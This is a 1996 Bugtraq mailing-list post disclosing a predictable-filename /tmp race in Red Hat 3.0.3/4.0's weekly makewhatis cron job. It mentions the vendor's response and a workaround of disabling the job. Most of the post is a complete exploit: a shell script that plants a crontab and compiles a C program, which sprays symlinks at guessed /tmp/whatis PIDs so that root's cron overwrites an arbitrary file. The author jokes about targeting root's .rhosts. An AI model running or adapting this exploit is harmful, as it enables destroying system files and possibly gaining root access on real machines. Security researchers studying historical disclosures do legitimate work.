'cron jobs, vendors, /tmp madness, et al.'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    cron jobs, vendors, /tmp madness, et al.
From:       "Dave G." <daveg () escape ! com>
Date:       1996-12-24 8:01:48
[Download RAW message or body]

    This post is relevent to 2 current bugtraq topics.  First off,
shell scripts using /tmp with predictable filenames.  I found this bug
over the weekend, and it affects Redhat Linux 3.0.3/4.0.  Then today,
Darren Reed mentions this type of problem, and SNI posts an advisory.
Bad day to be a shell script running out of root's crontab.

    The second topic is vendor responses.  Redhat was quick to respond to
me about this, and said a patch/update would be ready by next week. (which
is reasonable seeing as this bug wont affect anyone until next week)

    I dont think a patch for this is a big deal anyways, just disable it
from /etc/crontab, or remove the file makewhatis.cron from /etc/cron.weekly,
if you use 4.0.

#!/bin/sh
#
# blowitawaysam
#
# makewhatis is a shellscript that stores a tmp copy of the whatis
# database in /tmp/whatis[PID].  This is easily predictable, and even
# more easily brute forced.
#
# really silly script to blow away a file on redhat 3.0.3/4.0 system
# with makewhatis in /etc/crontab.  Severely limited as you can only
# overwrite one file a week with the whatis database.
#
# If someone is really clever, maybe they can overwrite ~root/.rhosts
# and try IP spoofing in from 'cat' as user '(1)' <smirk>
#
# Dave G.
# <daveg@escape.com>
# http://www.escape.com/~daveg
# 12/21/96

NUMLINKS=150 # I dont feel like guessing.  This will hit it.
             # Admittedly, it has as much style as a clumsy leper.

if [ -x /usr/bin/crontab ] ; then
   cat << ! > evil_cron
# These are for 3.0.3
19 03 * * 1 $PWD/overwrite $1 $NUMLINKS
00 04 * * 1 /bin/rm -f /tmp/whatis* $PWD/overwrite
# These are for 4.0
00 02 * * 0 $PWD/overwrite $1 $NUMLINKS
00 03 * * 0 /bin/rm -f /tmp/whatis* $PWD/overwrite
!

   /usr/bin/crontab evil_cron 2>&1 > /dev/null
   if [ $? -ne 0 ] ; then
      echo "You are in cron.deny.  Gonna have to do it yourself."
      exit 1
   fi

# this part could have been done in shell script,
# however, I found it easier to do in C.
# Bite me Hobbit :-)

   cat << ! > overwrite.c
   #include <stdio.h>
   #include <unistd.h>

   int main(int argc, char **argv)
   {
      int i,t, really;
      pid_t sucks;
      char alot[100];

      t=atoi(argv[2]);
      sucks=getpid();
      for ( i=0 ; i<t ; i++ )
      {
         really = sucks + i;
         sprintf(alot, "/tmp/whatis%d", really);
         symlink(argv[1], alot);
      }
   }
!

   cc -O6 -o overwrite overwrite.c
   chmod 755 $PWD/overwrite
   rm overwrite.c evil_cron

   echo Everything is set up.  Leave the program overwrite exactly where it is.
   echo now you just have to wake till sunday for 4.0 or monday for 3.0.3.
else
   echo no cron for you.
fi
----


Well that is it for this week.

Dave G.
<daveg@escape.com>
http://www.escape.com/~daveg

[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic